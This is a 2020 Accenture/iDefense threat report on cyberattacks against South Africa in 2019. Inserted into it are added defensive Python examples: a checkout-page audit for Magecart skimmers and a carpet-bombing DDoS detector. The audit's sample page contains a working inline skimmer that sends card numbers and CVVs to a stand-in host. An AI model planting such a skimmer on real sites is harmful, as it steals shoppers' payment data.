CYBERTHREAT LANDSCAPE IN SOUTH AFRICA - Accenture

INSIGHT INTO THE CYBERTHREAT LANDSCAPE IN SOUTH AFRICA
EXECUTIVE SUMMARY
As the use of, and reliance on, technology, the Internet and smartphones grows in South Africa, so does the attack surface and the opportunity for cyberthreat actors. In 2019, South Africa saw a spike in cyberattacks on all fronts: banks, Internet service providers (ISPs), utilities and ecommerce platforms were hit, as were consumers.

In this report, iDefense, an Accenture security intelligence company, looks at the trends and incidents from 2019, identifying the reasons for these attacks and suggesting ways in which businesses in South Africa can better prepare themselves to defend against them.

                                                 Copyright © 2020 Accenture. All rights reserved.
OVERVIEW
South Africa experienced a cross-industry spike in cyberattacks in 2019. The following facts and figures, taken from a variety of sources over the past 12 months, indicate the scale of the problem:

•    Cybersecurity company Kaspersky has noted that malware attacks in South Africa increased by 22 percent in the first quarter of 2019 compared to the first quarter of 2018,[1] which translates to just under 577 attempted attacks per hour.

•    Android mobile phones in South Africa were the second most targeted by banking malware,[2] behind only those in Russia.

•    Virtual-currency-related crime is on the rise,[3] with hackers increasingly using people's phones to mine cryptocurrencies.

•    Card-not-present (CNP) fraud on South African-issued credit cards remained the leading contributor to gross fraud losses in the country, accounting for 79.5 percent of all losses.[4]

•    South Africa has seen an increase of more than 100 percent in mobile banking application fraud.[5]

In addition to these worrying general trends, 2019 was a year in which a range of different threat actors found success when attacking high-profile South African targets, from ISPs to electricity providers, as the following section shows.

TIMELINE OF NOTABLE ATTACKS

February 2019: A South African energy supplier suffered two security breaches in quick succession.[6] In the first, a staff member incurred an infection from the information stealer AZORult after downloading a game from the Internet. In the second, a security researcher discovered an unsecured database containing sensitive information.

July 2019: The South African Civil Aviation Authority (SACAA) reported a failure of some of its IT systems.[7] A representative announced that "some files had suspicious characteristics", resulting in some servers being disconnected from the network by SACAA.

July 2019: Ransomware infected a provider of pre-paid electricity.[8] The malware encrypted the company's internal network, Web applications and official website, leaving customers unable to buy power. The infection occurred on July 24, the day before a standard payday for many South Africans, when many purchase new electricity packages for the upcoming month.

August 2019: The United Nations announced an investigation into at least 35 instances in 17 countries in which North Korean threat actors used cyberattacks to illegally raise funds.[9] The majority of these countries were developing countries, and South Africa was on the list. These incidents took the form of attacks through the Society for Worldwide Interbank Financial Telecommunication (SWIFT) system, which is used to transfer money between banks; the theft of cryptocurrency by attacking both exchanges and users; and the mining of cryptocurrency. A bank in Africa was thought to have been a victim of a SWIFT-based attack, but South African banks denied any security breaches.

September 2019: Garmin South Africa disclosed that sensitive customer payment data entered into its shopping portal, shop.garmin.co.za, had been stolen.[10] Magecart is a type of cyberattack in which malicious JavaScript is implanted on ecommerce sites to steal credit card information as people transact online; because the skimmer runs in the shopper's browser on a page served over HTTPS, the merchant's own transport encryption does nothing to stop it. This Magecart incident affected 6,700 South African customers. The stolen data contained payment information, including card numbers, expiration dates and CVV codes, first and last names, physical addresses, phone numbers and e-mail addresses.
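The Garmin entry above describes malicious code implanted on a checkout page. The following is an added example, not code from this report, from iDefense or from Garmin South Africa: a script-inventory audit of a checkout page that flags scripts loaded from hosts outside an allowlist, third-party scripts without Subresource Integrity, and inline scripts that both read card fields and send data off-page. The page HTML, the allowlist and every hostname in it are constructed and hypothetical.

```python
"""Checkout-page script inventory: a baseline Magecart/skimmer check.

Added example, not code from the Accenture/iDefense report or from Garmin.
A Magecart skimmer is JavaScript that ends up on the payment page through
a compromised first-party file, a hijacked third-party tag or an injected
inline block; it reads the card fields and posts them to an attacker host.
The defensive baseline is therefore to know exactly which scripts a checkout
page loads, to pin external ones with Subresource Integrity (SRI) and to
treat any deviation as an incident. The page below is constructed sample
input and every hostname, including the allowlist, is hypothetical.
"""
from html.parser import HTMLParser
from urllib.parse import urlparse
import re

# Hypothetical allowlist for a fictional shop: the first-party origin plus its payment provider.
ALLOWED_SCRIPT_HOSTS = {"shop.example.co.za", "js.payments-example.com"}

# Behavioural indicators for inline code: card-field access combined with an outbound send.
FIELD_HINTS = re.compile(r"(cardnumber|card_number|cvv|cvc|expir)", re.I)
SEND_HINTS = re.compile(r"(XMLHttpRequest|fetch\(|sendBeacon|new Image\(|\.src\s*=)", re.I)


class ScriptCollector(HTMLParser):
    """Collects external <script src> tags with their attributes and inline script bodies."""

    def __init__(self):
        super().__init__()
        self.external = []      # [{"src": ..., "integrity": ...}, ...]
        self.inline = []        # inline script bodies
        self._in_inline = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        a = dict(attrs)
        if a.get("src"):
            self.external.append({"src": a["src"], "integrity": a.get("integrity")})
        else:
            self._in_inline, self._buf = True, []

    def handle_data(self, data):
        if self._in_inline:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_inline:
            self.inline.append("".join(self._buf))
            self._in_inline = False


def audit_checkout_page(html, page_host, allowed_hosts=ALLOWED_SCRIPT_HOSTS):
    """Return a list of (severity, reason, detail) findings for one checkout page."""
    collector = ScriptCollector()
    collector.feed(html)
    findings = []
    for script in collector.external:
        host = urlparse(script["src"]).hostname or page_host   # relative src is first-party
        if host not in allowed_hosts:
            findings.append(("high", "script from unlisted host", script["src"]))
        elif host != page_host and not script["integrity"]:
            findings.append(("medium", "third-party script without SRI", script["src"]))
    for body in collector.inline:
        if FIELD_HINTS.search(body) and SEND_HINTS.search(body):
            findings.append(("high", "inline script reads card fields and sends data",
                             body.strip()[:60]))
    return findings


# Constructed sample page: a pinned payment-provider tag, an injected analytics host
# that is not on the allowlist, and an inline skimmer that beacons the card number out.
SAMPLE_PAGE = """
<html><body>
<script src="/static/checkout.js"></script>
<script src="https://js.payments-example.com/v1.js" integrity="sha384-constructedplaceholder"></script>
<script src="https://cdn-stats-example.net/analytics.js"></script>
<script>
  document.querySelector('#cardNumber').addEventListener('blur', function () {
    var p = {n: this.value, c: document.querySelector('#cvv').value};
    new Image().src = 'https://collect-example.net/g?d=' + btoa(JSON.stringify(p));
  });
</script>
</body></html>
"""

if __name__ == "__main__":
    for severity, reason, detail in audit_checkout_page(SAMPLE_PAGE, "shop.example.co.za"):
        print(f"[{severity}] {reason}: {detail}")
```

In practice the inventory is compared against a stored baseline of the page on every deploy and on a schedule, not against a hand-kept allowlist, and it is backed by a Content-Security-Policy whose script-src, connect-src and img-src directives limit where code may load from and where form data may be sent; the constructed skimmer above, which exfiltrates through an image request, would be blocked by a restrictive img-src even if the audit missed it.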
Stolen payment data of this kind often finds its way to Dark Web online marketplaces where threat actors purchase it and use it to defraud victims.

September 2019: On September 21, 2019, one of South Africa's largest ISPs suffered a distributed denial of service (DDoS) attack lasting two days.[11] The attack also targeted another South African ISP. The attack resulted in clients losing connectivity or receiving degraded performance throughout the weekend. The attack technique, known as "carpet bombing", sends junk traffic to many random IP addresses across a target network rather than to a single host: no one destination receives enough traffic to trip a per-address threshold or to justify diverting that address to a scrubbing service, while the aggregate still saturates the victim's links. Attackers have used this method for many years, but use spiked in 2018 due to the proliferation of stresser and booter (on-demand DDoS attack) services. Threat actors have previously used such services to take down ISPs in other developing countries, such as Cambodia and Liberia.

October 2019: A breach of a major South African city network resulted in unauthorised access to its systems.[12] Officials said the attack affected its call centers, website and online platforms. News sources reported this incident as a ransomware attack, but it was later established that nothing was encrypted. A group calling itself Shadow Kill Hackers claimed responsibility and attempted to extort its victim. The group also claimed to have gained access to the networks of a South African hotel accommodation service. The city noted that the attack was carefully timed to coincide with city month-end processes affecting supplier and customer payments.

October 2019: Also in October, several South African banks, as well as financial institutions in Singapore and Scandinavia, suffered DDoS attacks, resulting in a loss of service.[13] Threat actors issued a ransom note pretending to be the Russian threat actor groups Fancy Bear and Cozy Bear. This attack was similar to a 2017 campaign in which threat actors targeted backend servers rather than public websites, knowing that such servers were less likely to have DDoS mitigation protection. The DDoS attacks occurred on payday, resulting in delayed paychecks, which suggests that threat actors planned the attacks to cause maximum disruption.
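The carpet-bombing technique described in the September 2019 ISP entry works by spreading traffic across a target's address range. As an added example, not code from this report, from iDefense or from the ISPs involved, the Python below runs the same constructed flow records through a per-destination-host threshold and a per-/24 threshold and shows that only the prefix view catches the spread attack, while only the host view catches a classic single-target flood. The flow records, thresholds, 60-second window and addresses are assumptions.

```python
"""Carpet-bombing DDoS detection from flow records.

Added example, not code from the Accenture/iDefense report or from the
ISPs involved. A volumetric DDoS detector keyed on the destination IP
fires when one host is flooded. A carpet-bombing attack defeats it by
spreading the junk traffic across hundreds of addresses in the victim's
range: no single address crosses the per-host line while the upstream
link is still saturated. Re-keying the same flows on the destination
prefix (here a /24) makes the attack visible again. Flow records,
thresholds and the 60-second window are constructed assumptions.
"""
from collections import defaultdict
import ipaddress


def rate_mbps(nbytes, window_s):
    """Convert a byte count seen over window_s seconds into megabits per second."""
    return nbytes * 8 / (window_s * 1_000_000)


def sum_by(flows, key_fn):
    """Sum bytes of (dst_ip, bytes) records under an arbitrary grouping key."""
    totals = defaultdict(int)
    for dst, nbytes in flows:
        totals[key_fn(dst)] += nbytes
    return totals


def detect_volumetric(flows, window_s, per_host_mbps, per_prefix_mbps, prefix_len=24):
    """Return (host_alerts, prefix_alerts).

    host_alerts:   {dst_ip: mbps}  destinations whose rate exceeds per_host_mbps
    prefix_alerts: {cidr: mbps}    destination prefixes whose rate exceeds per_prefix_mbps
    """
    by_host = sum_by(flows, lambda d: d)
    by_prefix = sum_by(
        flows,
        lambda d: str(ipaddress.ip_network(f"{d}/{prefix_len}", strict=False)),
    )
    host_alerts = {
        h: round(rate_mbps(b, window_s), 1)
        for h, b in by_host.items()
        if rate_mbps(b, window_s) > per_host_mbps
    }
    prefix_alerts = {
        p: round(rate_mbps(b, window_s), 1)
        for p, b in by_prefix.items()
        if rate_mbps(b, window_s) > per_prefix_mbps
    }
    return host_alerts, prefix_alerts


def build_sample_flows():
    """Constructed 60-second sample: one carpet-bombing run, one normal host, one classic flood.

    Addresses are taken from the RFC 5737 documentation ranges.
    """
    flows = []
    # Carpet bombing: 200 addresses in 203.0.113.0/24, 50 MB each (about 6.7 Mbps per host,
    # but about 1333 Mbps for the prefix as a whole).
    for host in range(1, 201):
        flows.append((f"203.0.113.{host}", 50_000_000))
    # Ordinary customer traffic: 200 MB to one server (about 26.7 Mbps).
    flows.append(("198.51.100.10", 200_000_000))
    # Classic single-target flood: 1.5 GB to one host (200 Mbps).
    flows.append(("198.51.100.20", 1_500_000_000))
    return flows


if __name__ == "__main__":
    hosts, prefixes = detect_volumetric(build_sample_flows(), window_s=60,
                                        per_host_mbps=100, per_prefix_mbps=1000)
    print("per-host alerts:  ", hosts)      # only the classic flood on 198.51.100.20
    print("per-prefix alerts:", prefixes)   # only 203.0.113.0/24, the carpet-bombed range
```

The same aggregation matters for mitigation as well as detection: diverting a single /32 to a scrubbing provider, the usual response to a host-level alert, does nothing against a carpet-bombing run, so the prefix-level alert should trigger diversion or filtering of the whole affected range.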

WHY IS SOUTH AFRICA SUCH AN ATTRACTIVE TARGET?
Threat actors may perceive South African organisations as having lower defensive barriers than companies in more developed economies. They may also believe that they have a lower chance of being caught or prosecuted. iDefense suggests that the increased focus on South Africa by cyberthreat actors is due to the following interconnected factors:

•   Lack of investment in cyber security: South Africa struggles with high crime rates, inequality and poverty, high unemployment and a shortage of skilled labor. While many developing economies consider cyber security a necessity, businesses often cannot invest sufficient funds. Those that can invest face shortages of trained cybersecurity practitioners. This hampers South Africa's ability to put measures in place to prevent and mitigate advanced threats.

•   Developing cybercrime legislation and law enforcement training: Developing countries often lack comprehensive cybercrime legislation,[14] making them safe havens for illegal operations. South Africa has been slow to adopt cybercrime legislation. While the National Assembly adopted the Cyber Crimes Bill in January 2020, intense public scrutiny of its impact on privacy and freedom of expression has resulted in delays. In addition, while the South African Police Service is now also empowered to act against such crimes, a lack of cybercrime training may cause challenges in the short term.

•   Poor public knowledge of cyber threats: South Africa has the second highest GDP[15] and operates the second fastest Internet[16] in Africa. Investment in new tech startups is booming[17] and the country is employing technological solutions to achieve a vast array of business and social needs. However, iDefense analysts note that South African Internet users are inexperienced and less technically alert than users in other nations.
    One report concluded that a worrying 31 percent of South Africans thought that a cyber threat that encrypts files and demands payment is a Trojan virus, and that more than 50 percent of respondents were not aware of multi-factor authentication or its benefits. As an increasing proportion of the population begins connecting to the Internet for the first time, this inexperience paired with increased exposure is a potent combination that cyber criminals will try to exploit. While threat actors are still attempting to exploit digital platforms such as banking sites or other places that store financial data, the mitigation strategies these entities deploy are usually robust, so it is easier to target individuals, due to their low levels of technical knowledge.

•   The use of shadow IT: iDefense analysts note that shadow IT (the use of applications and infrastructure without the knowledge of an enterprise's IT department) is rife in South African companies.[18] After conducting a survey of South African IT professionals and senior executives, one recent report concluded that "We have found that organisations have hugely underestimated their exposure to applications, which could have inherent risk to business". The use of personal devices or applications on business networks can pose a significant risk, providing gateways for the deployment of ransomware or other infection vectors on a network.

•   Threat actors are taking notice: iDefense analysts note that between 2010 and 2014 they rarely saw any Dark Web threat actors mentioning South Africa (see Exhibit 1). However, mentions picked up slightly between 2014 and 2016. Since 2016 there has been a much higher focus on South Africa among the criminal underground.

Exhibit 1: Mentions of "South Africa" between 2010 and 2020 on Dark Web (chart; vertical axis 0 to 250 mentions, horizontal axis from February 2010 to January 2020)

iDefense analysts note that attacks against South Africa are consistent with attacks in other world economies. These attacks include the use of ransomware, banking Trojans, business e-mail compromise (BEC) scams and carding fraud. The difference is that South Africa is experiencing these threats in bulk for the first time. When iDefense examined the Scandinavian threat landscape, it found malicious actors could still use rudimentary scams successfully because the targeted businesses and people had not been exposed to them before. This same trend is playing out in South Africa. However, the threat is amplified as South Africans are inherently less aware of cyber threats than the populations of some other nations.

iDefense highlights the following areas noted in the targeting of South African organisations on cybercriminal underground forums:

•   The rapid uptake in recent years in the use of mobile financial services (MFS) among South Africans leaves users vulnerable to banking Trojans and Android banking malware, the use of which has been steadily increasing among threat actors since 2017. In particular, LokiBot, RedAlert and Anubis have been under constant development and are widely available among criminal threat actors.

•   Malicious actors use rudimentary scams like BEC scams, phishing, vishing and smishing abundantly against South African targets, especially small, underequipped businesses. The use of these scams remains universal, especially against developing countries, as they have less resilience to these scams than more-advanced economies.

•   The use of ransomware has increased in popularity. Ransomware is widely available for sale across the criminal underground for as little as US$100. This enables unskilled threat actors to conduct malicious activities simply by purchasing the tools they need. iDefense also observed a new trend where advanced threat actor groups target larger entities, such as city administrations, as such targets can pay higher ransoms.

•   Some threat actors may consider South Africa a testing ground for malware.[19] As cybersecurity measures are not as robust amongst private and public enterprises in South Africa as they are in other countries globally, some actors may test their tools and techniques against South African targets before deploying them against sophisticated targets.

WHAT CAN BE DONE?
As cybercrime figures continue to rise, South African organisations need to get serious about defending their businesses and protecting their customers. iDefense recommends a number of actions: making use of security and threat intelligence, protecting against internal threats and people-based attacks, and focussing on compliance by applying standards and best practices.

•    Make use of security and threat intelligence: This has previously been the reserve of large, well-funded organisations, but is now accessible and affordable to most businesses. Accenture's ninth annual report on "The Cost of Cybercrime"[20] reported that security intelligence and threat sharing provides the greatest cost savings compared with levels of spending (US$2.26 million). Security and threat intelligence is not only an important enabling technology for both discovery and investigation activities, it is a valuable source of information to understand threats and better use resources against anticipated attacks.

•    Prioritise protecting against people-based attacks: Counteracting internal threats is still one of the biggest challenges business leaders face today. Increases in phishing, ransomware and malicious insider attacks mean that organisations need to place greater emphasis on nurturing a security-first culture. Training and education are essential to reinforcing safe behaviors, both for people within an organisation and across entire business ecosystems.

•    Focus on compliance: Many organisations already have tools and solutions in place to help them with data compliance. However, these tools are often configured incorrectly. When business tools and services are installed and configured correctly, much of the work of data compliance is already done. Particular attention should be paid to the reduction of shadow IT.

•    Prepare for when, not if: The previous points all relate to detection and "pre-breach" preparation. For post-breach incidents, such as those listed in this report, put clear procedures in place, including an incident-response capability, post-incident analysis, backed-up data, anti-DDoS measures and cloud access security brokers. Backups only help against ransomware if copies are kept offline or otherwise out of reach of a compromised network, and if restores are tested regularly rather than assumed to work.

REFERENCES

1    https://www.fin24.com/Companies/ICT/major-spike-in-sa-cyber-attacks-over-10-000-attempts-a-day-security-company-20190429
2    https://www.forbes.com/sites/tobyshapshak/2019/05/09/south-africa-has-second-most-android-banking-malware-attacks-as-cyber-crime-increases/#47a6a6d85d77
3    http://www.itwebafrica.com/security/514-south-africa/246610-virtual-currency-crime-spikes-in-south-africa
4    https://www.sabric.co.za/media-and-news/press-releases/sabric-annual-crime-stats-2018/
5    http://www.itwebafrica.com/home-pagex/opinion/246661-counting-the-cost-of-cybercrime
6    https://www.bleepingcomputer.com/news/security/power-company-has-security-breach-due-to-downloaded-game/
7    https://www.fin24.com/Companies/Industrial/sa-civil-aviation-authority-launches-investigation-into-possible-cyber-hack-20190708
8    https://www.zdnet.com/article/ransomware-incident-leaves-some-johannesburg-residents-without-electricity/
9    https://apnews.com/ece1c6b122224bd9ac5e4cbd0c1e1d80
10   https://www.bleepingcomputer.com/news/security/garmin-sa-shopping-portal-breach-leads-to-theft-of-payment-data/
11   https://www.zdnet.com/article/carpet-bombing-ddos-attack-takes-down-south-african-isp-for-an-entire-day/
12   https://www.zdnet.com/article/city-of-johannesburg-held-for-ransom-by-hacker-gang/
13   https://www.thesslstore.com/blog/cyber-attacks-hit-the-city-of-johannesburg-and-south-african-banks/
14   https://unctad.org/en/pages/PressRelease.aspx?OriginalVersionID=238
15   https://en.wikipedia.org/wiki/List_of_African_countries_by_GDP_(nominal)
16   https://moguldom.com/220816/10-african-countries-with-the-fastest-broadband-speeds/
17   https://www.forbes.com/sites/tobyshapshak/2020/01/20/african-tech-start-ups-have-record-investment-year-in-2019/#56e6b62832f9
18   https://www.itweb.co.za/content/4r1lyMRoaVAqpmda
19   https://www.itweb.co.za/content/wbrpOMgPAkeqDLZn
20   "Addressing the growing spectre of cyber crime in Africa: evaluating measures adopted by South Africa and other regional role players", Fawzia Cassim. https://www.accenture.com/_acnmedia/pdf-96/accenture-2019-cost-of-cybercrime-study-final.pdf

ABOUT ACCENTURE
Accenture is a leading global professional services company, providing a broad range of services and solutions in strategy, consulting, digital, technology and operations. Combining unmatched experience and specialised skills across more than 40 industries and all business functions, underpinned by the world's largest delivery network, Accenture works at the intersection of business and technology to help clients improve their performance and create sustainable value for their stakeholders.

With 505,000 people serving clients in more than 120 countries, Accenture drives innovation to improve the way the world works and lives.

Visit us at www.accenture.com

AUTHORS
WANDILE MCANYANA, Security Lead, Accenture in Africa, wandile.mcanyana@accenture.com
CLIVE BRINDLEY, Senior Manager, Security, Accenture in Africa, clive.brindley@accenture.com
YUSOF SEEDAT, Head of Global Geographies, Accenture Research, yusof.seedat@accenture.com

MAIN CONTRIBUTORS
PAUL MANSFIELD, Cyber Threat Intelligence Analyst, iDefense, paul.a.mansfield@accenture.com
THOMAS WILLKAN, Cyber Threat Intelligence Analyst, iDefense, thomas.willkan@accenture.com

Copyright © 2020 Accenture. All rights reserved. Accenture, its logo, and High Performance Delivered are trademarks of Accenture.

The views and opinions expressed in this document are meant to stimulate thought and discussion. As each business has unique requirements and objectives, the ideas should not be viewed as professional advice with respect to your business. This document makes descriptive reference to trademarks that may be owned by others. The use of such trademarks herein is not an assertion of ownership of such trademarks by Accenture and is not intended to represent or imply the existence of an association between Accenture and the lawful owners of such trademarks.